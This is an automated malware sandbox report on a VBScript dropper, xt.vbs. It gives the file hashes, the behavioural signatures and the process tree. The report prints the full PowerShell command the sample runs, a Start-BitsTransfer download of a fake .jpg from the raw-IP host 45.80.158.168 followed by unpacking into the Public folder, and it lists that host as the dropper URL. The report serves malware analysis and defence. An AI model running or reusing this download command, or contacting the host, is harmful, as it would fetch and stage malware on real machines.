Analysis

max time kernel: 361s
max time network: 362s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 20-03-2024 19:06
Static task: static1

Behavioral task: behavioral1
  Sample: xt.vbs
  Resource: win7-20240221-en
  4 signatures, 600 seconds

Behavioral task: behavioral2
  Sample: xt.vbs
  Resource: win10v2004-20240226-en
  14 signatures, 600 seconds
General

Target: xt.vbs
Size: 728B
MD5: 617b93b01b88973de9237d3115c73b7a
SHA1: 2b17b017b3b552d0d0744810a8b50420baf847d1
SHA256: 45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b
SHA512: 458c8c1239f88a19b83c5c370e7bf87efd4d57abc2a406e1ec5f6edabb95b6f644c384cc9669710529faf90e5c03890f7bb7e7a5a6a098d1e5b9fdca254c6d77
Score: 10/10
Malware Config

Extracted
  Language: ps1
  Deobfuscated
  URLs
    exe.dropper: http://45.80.158.168:222/x.jpg
Signatures

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    2784  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2784  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                       pid   process      target process
    PID 2188 wrote to memory of 2784  2188  WScript.exe  powershell.exe
    PID 2188 wrote to memory of 2784  2188  WScript.exe  powershell.exe
    PID 2188 wrote to memory of 2784  2188  WScript.exe  powershell.exe
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
  Suspicious use of WriteProcessMemory
  PID: 2188

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2188)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID: 2784